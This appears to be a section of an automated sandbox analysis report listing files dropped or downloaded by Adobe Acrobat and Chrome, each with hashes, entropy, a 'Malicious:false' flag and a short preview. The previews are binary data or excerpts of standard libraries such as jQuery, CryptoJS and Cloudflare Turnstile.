                                                                                          Preview:...........=kw.6...W.=^r.(~.yHe...$.:...4......,..H.......;.....;..f.aO[.......3....ok...kE..)m..E.f....5.h.E)...[.........{.....=...'.....)..N.+z>.F.?.I<.<..%O...9.?.pssz..t.b_gdy..{..K.'...\:.D..p..k.]N..u\.4....b...oG.k.#.>.........[....>.?....X.#1.!......Q.`..w4.....5...'.......v.).x.z.....Y..#.6WwG.$../F....|M?..,..V.i.:.C..1........E...u.eM...*z............t.s...y{...W..K..k.k.1..c..onr.../.)?.Y.c.-`0.j.................. i..u<...J.2. ..@...I0. .....^.Q;2.....0B...z;.hgm.../..._.....#H........8^6..h.R$...q.d.r..b.\..[".B...[l.... .!..h..x.<.1.PG....a^.."......~.n"&zWa...q.a.1.....,..{.....d..12..A.6.aG.\...".]b..'F%.....S'."....^.p>e.......>.OH..$:..9H~V-}.E..G.D..}D.bZDB.^..h.1......D.Pn.:. .~.....+...@n.q..~...8.$1.H....!....1...YeE.G^yZ..%.".O....!....s..g7....Z....:..di+1.........=...oi..j1I...#?.....P.....U..!Gm!.K)..6......OZ.q.H.q@Ii..y.....0..B.x=.f4M..@..*..|Jc.0d.....8...Q..@^..m.....E.U5.U.g.+...aN..8`Kuz..W...3.,r..
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                          Category:dropped
                                                                                          Size (bytes):1407294
                                                                                          Entropy (8bit):7.97605879016224
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R077WLaGZ7wYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs03WLaGZw
                                                                                          MD5:8B9FA2EC5118087D19CFDB20DA7C4C26
                                                                                          SHA1:E32D6A1829B18717EF1455B73E88D36E0410EF93
                                                                                          SHA-256:4782624EA3A4B3C6EB782689208148B636365AA8E5DAF00814FA9AB722259CBD
                                                                                          SHA-512:662F8664CC3F4E8356D5F5794074642DB65565D40AC9FEA323E16E84EBD4F961701460A1310CC863D1AB38849E84E2142382F5DB88A0E53F97FF66248230F7B9
                                                                                          Malicious:false
                                                                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                          Category:dropped
                                                                                          Size (bytes):1419751
                                                                                          Entropy (8bit):7.976496077007677
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:/gWL07okZwYIGNPUGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:4WLxkZwZG6GZn3mlind9i4ufFXpAXkru
                                                                                          MD5:ACB1B27818CEB36D0750207A9585D1DE
                                                                                          SHA1:6F8E0D68875083DD83681391CE1C8304D0CF8C29
                                                                                          SHA-256:BAB1F04D2DB8ADF240CFE93D51DFDA5CABE1D1DA91DCC807D2ABD93E030926D6
                                                                                          SHA-512:AFE11C5D4A50430BE73E2D82081C6C02DB93A8368999C9139863A5A2DD0780066E020A5D2FDC94612E808862C8FB0CF90CA92E7CEAAAFEB4C3EA59703229B4AA
                                                                                          Malicious:false
                                                                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 27 13:14:41 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                          Category:dropped
                                                                                          Size (bytes):2673
                                                                                          Entropy (8bit):3.989196504533631
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:8XS0dCTO6fHRidAKZdA1FehwiZUklqeh2y+3:8CRDDBy
                                                                                          MD5:B49D1203729E7A9D73BD50CD7ABA55FD
                                                                                          SHA1:B849A7CBC62242766B712E37B0A926DA972DD97E
                                                                                          SHA-256:7F452F4C84914F3DD9D9015019C39608FF6AA825D3E7ECB25A7D821A20669CC4
                                                                                          SHA-512:1C981919BD75E684FF428603BDD29914A193E61D99F12DB96E17BBA4A528ED07AEEAC7F2772EFA1B3783F8A2EB3AC18329A523B9AD29C28F7CECCF46931F9336
                                                                                          Malicious:false
                                                                                          Preview:L..................F.@.. ...$+.,.......@..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I{Y.q....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V{Y.q....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V{Y.q....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V{Y.q..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V{Y.q...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........'2.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 27 13:14:41 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                          Category:dropped
                                                                                          Size (bytes):2675
                                                                                          Entropy (8bit):4.007097941442569
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:8Y0dCTO6fHRidAKZdA1seh/iZUkAQkqehxy+2:8YRDN9QEy
                                                                                          MD5:165714B7FCAB2429AB4783DD61FA8E6F
                                                                                          SHA1:8A186AB6DC842168FCF0E99B32DD1E6814E307B2
                                                                                          SHA-256:CD82DF00C21C09C1A9BD941EFCC0CDCF0C462AB3ED92EB9971C72F48F60C886C
                                                                                          SHA-512:F7FDEA802BE15DBDE84BDE0AAA9271A87ED9E4AB770C6CD937D821D68284760FE5F725A84CE579A6EC66101D1A46B1879B58B4346996FEDA70769A89332C40A0
                                                                                          Malicious:false
                                                                                          Preview:L..................F.@.. ...$+.,....P....@..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I{Y.q....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V{Y.q....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V{Y.q....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V{Y.q..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V{Y.q...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........'2.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                          Category:dropped
                                                                                          Size (bytes):2689
                                                                                          Entropy (8bit):4.013152508295614
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:8g0dCTO6AHRidAKZdA14meh7sFiZUkmgqeh7sny+BX:8gRDYndy
                                                                                          MD5:18027FC59D27C155EE21404E1AFE6441
                                                                                          SHA1:E80DD71047FC9B818A2805A80655483D04F42221
                                                                                          SHA-256:20224E24ADA5DA32B5A34653A43A6033595F7535674E371B36F97B32277119A1
                                                                                          SHA-512:D5815BFCA553F49D85B5CB10EEC425C5E2514C395E5709698FE84CFC8235AF1A41C0970ED5EAD94A161480544F523AE00C4BE96F4D4621BE88AFF36EC3185627
                                                                                          Malicious:false
                                                                                          Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I{Y.q....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V{Y.q....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V{Y.q....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V{Y.q..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........'2.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 27 13:14:41 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                          Category:dropped
                                                                                          Size (bytes):2677
                                                                                          Entropy (8bit):4.005421522331382
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:810dCTO6fHRidAKZdA1TehDiZUkwqehFy+R:81RD+vy
                                                                                          MD5:8F993F79163F604ABF0B2F1F0A972EF5
                                                                                          SHA1:549F3A7B64C257706FA19634E55ACAAA5F1FD026
                                                                                          SHA-256:0A71142C92414386E8B728D6854EE13EBE4FD2F56DADCBC609C7EB3464B874C7
                                                                                          SHA-512:1BA27092F5D3BF65E69BD73B2CBBF9C2D681045A7CDA7E23781FC501353A42A62EF62C834FF61DEA7C04B73480C0005AC74228B965C01030FDA246C0368DD3F7
                                                                                          Malicious:false
                                                                                          Preview:L..................F.@.. ...$+.,.........@..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I{Y.q....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V{Y.q....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V{Y.q....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V{Y.q..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V{Y.q...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........'2.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 27 13:14:41 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                          Category:dropped
                                                                                          Size (bytes):2677
                                                                                          Entropy (8bit):3.991936921671253
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:8J0dCTO6fHRidAKZdA1dehBiZUk1W1qehTy+C:8JRDu9zy
                                                                                          MD5:CA6BCFCBDAB7E3E3FE9CB7602F4E0443
                                                                                          SHA1:1B59CFC7A366D1093F5913A83998B27065F086C7
                                                                                          SHA-256:901CF9BD7DA7419A9D8C89DBE1AAE3543825D50A60180ADF2066D12C2C8AEF51
                                                                                          SHA-512:E9CE4026B0FBECB36F11B2A58871F88595978EACD0C69332BE1F2B359409183C2B5075320B98F7950F696F51929E04EE815CAAC6A4A36B9524CCF40E7E009504
                                                                                          Malicious:false
                                                                                          Preview:L..................F.@.. ...$+.,.... ....@..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I{Y.q....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V{Y.q....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V{Y.q....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V{Y.q..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V{Y.q...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........'2.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 27 13:14:41 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                          Category:dropped
                                                                                          Size (bytes):2679
                                                                                          Entropy (8bit):4.00338600315108
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:860dCTO6fHRidAKZdA1duTeehOuTbbiZUk5OjqehOuTbdy+yT+:86RDETfTbxWOvTbdy7T
                                                                                          MD5:2004291037A6A5F2328644D92162188F
                                                                                          SHA1:095DB7B6CF3985C3E36EF0D8A6C19177A242F38D
                                                                                          SHA-256:5B31DAE53FC31D4D8910AEAF4DB7C0FDFF3B212141A10EE8843CD653BE069B28
                                                                                          SHA-512:2449B11720E7CF12D076D3FBFB33B5A4F06050AF6DF74942BCB78D4D5393C27BDDC59568DA0AFB165FCF3667E5A611E6F0C831BEE37A9D3DA202CA2DE6C193E1
                                                                                          Malicious:false
                                                                                          Preview:L..................F.@.. ...$+.,......w..@..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I{Y.q....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V{Y.q....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V{Y.q....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V{Y.q..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V{Y.q...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........'2.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):48316
                                                                                          Entropy (8bit):5.6346993394709
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                          MD5:2CA03AD87885AB983541092B87ADB299
                                                                                          SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                          SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                          SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                          Malicious:false
                                                                                          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          File Type:ASCII text, with very long lines (47694)
                                                                                          Category:downloaded
                                                                                          Size (bytes):47695
                                                                                          Entropy (8bit):5.401531363850578
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:IXCtQmIutwVHbzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZU8nw81KZLGcD:IGJWHbzZBF6xbGfLsVvy33FU8DW
                                                                                          MD5:1685878B80EECB073E51C13F17A5E530
                                                                                          SHA1:0FFFA666F98F2D8C1156D46D7F9AB90C5B089AF3
                                                                                          SHA-256:C61E2E1347B9ACA3D8F0C9725490470651A1F6C02841FF71F90305EA391CA6D2
                                                                                          SHA-512:2B32A82A8E7E0A1F6203A04C3E7DDAE6AC3A4438B2309DC04EA112D862839902DD47D2E4A569BCB6F91E359B1F8197F3A179A206A458881A66E89860F96D526E
                                                                                          Malicious:false
                                                                                          URL:https://challenges.cloudflare.com/turnstile/v0/b/a6e12e96a2d5/api.js
                                                                                          Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                          Category:downloaded
                                                                                          Size (bytes):48316
                                                                                          Entropy (8bit):5.6346993394709
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                          MD5:2CA03AD87885AB983541092B87ADB299
                                                                                          SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                          SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                          SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                          Malicious:false
                                                                                          URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          File Type:ASCII text, with very long lines (65447)
                                                                                          Category:dropped
                                                                                          Size (bytes):89501
                                                                                          Entropy (8bit):5.289893677458563
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                          Malicious:false
                                                                                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          File Type:PNG image data, 37 x 8, 8-bit/color RGB, non-interlaced
                                                                                          Category:dropped
                                                                                          Size (bytes):61
                                                                                          Entropy (8bit):4.035372245524405
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:yionv//thPlA3tn/ELkxl/k4E08up:6v/lhP+cLk7Tp
                                                                                          MD5:A2A061418640DDFE69FC7AC01407ECD1
                                                                                          SHA1:B54B6EE3E6BAAC14C9E958960484EC93D0F18872
                                                                                          SHA-256:CF5272CCDE4649F3C29176CC21D8B12C9E1C837E529ED44EDCA2CDC55B31661E
                                                                                          SHA-512:19E61E0BB5B01FC40E0E12B5392A0E0D66A7B81095855B5F946A0967740D9C77E29522CD521704B2E63630E45289C5D96160DD86C3987FF7BD1A10B1230A8542
                                                                                          Malicious:false
                                                                                          Preview:.PNG........IHDR...%................IDAT.....$.....IEND.B`.
                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          File Type:PNG image data, 37 x 8, 8-bit/color RGB, non-interlaced
                                                                                          Category:downloaded
                                                                                          Size (bytes):61
                                                                                          Entropy (8bit):4.035372245524405
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:yionv//thPlA3tn/ELkxl/k4E08up:6v/lhP+cLk7Tp
                                                                                          MD5:A2A061418640DDFE69FC7AC01407ECD1
                                                                                          SHA1:B54B6EE3E6BAAC14C9E958960484EC93D0F18872
                                                                                          SHA-256:CF5272CCDE4649F3C29176CC21D8B12C9E1C837E529ED44EDCA2CDC55B31661E
